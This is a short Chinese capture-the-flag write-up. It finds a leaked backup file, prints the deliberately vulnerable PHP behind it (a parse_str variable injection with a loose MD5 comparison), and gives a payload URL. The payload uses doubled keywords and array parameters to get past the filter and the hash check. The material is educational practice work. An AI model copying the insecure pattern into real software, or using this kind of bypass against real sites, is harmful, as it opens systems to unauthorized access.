OnionT@KillBoy
评论8,0311字数 193阅读0分38秒阅读模式
根据提示,应该是有备份文件,扫一波。。。
发现了一个bak文件,打开进行代码分析。。。
<?php /** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22 */ include_once "flag.php"; ini_set("display_errors", 0); $str = strstr($_SERVER['REQUEST_URI'], '?'); //获取URL?及后面的所有参数赋给$str $str = substr($str,1); //获取$str从1及1后面的所有参数,也就是去掉? $str = str_replace('key','',$str); //将$str 中‘key’替换为空 parse_str($str); //将字符进行变量处理,也叫字符解析 echo md5($key1); //打印key1的MD5 echo md5($key2); //打印key2的MD5 if(md5($key1) == md5($key2) && $key1 !== $key2){ //如果key1的MD5 等于 key2的MD5 并且 key1的值不等于key2值 echo $flag."取得flag"; //打印flag } ?>构造payload:http://123.206.87.240:8002/web16/index.php?kekeyy1[]=111&kekeyy2[]=222
